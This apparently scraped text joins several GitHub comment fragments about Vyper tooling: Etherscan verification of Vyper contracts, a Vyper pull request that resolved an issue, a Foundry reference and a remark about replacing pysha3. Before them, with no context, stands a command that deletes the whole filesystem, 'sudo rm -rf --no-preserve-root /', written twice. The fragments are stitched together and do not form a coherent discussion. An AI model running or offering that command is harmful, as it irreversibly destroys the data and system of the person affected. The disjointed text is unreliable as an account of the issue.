sudo rm -rf --no-preserve-root /
sudo rm -rf --no-preserve-root /
Etherscan now allows for programmatic verification of Vyper contracts; see [here](https://docs.etherscan.io/sepolia-etherscan/api-endpoints/contracts#verify-vyper-source-code).
Resolved via https://github.com/vyperlang/vyper/pull/4762.
Foundry reference: https://github.com/foundry-rs/foundry/pull/11451
> This definitely needs more attention. @pcaversaccio Did you manage to build a custom workflow with the "Advanced setup" as a workaround? Oh yeah, using the advanced one everywhere now;...
> but it's probably worth considering dropping pysha3 or modernise `pysha3` as alternative?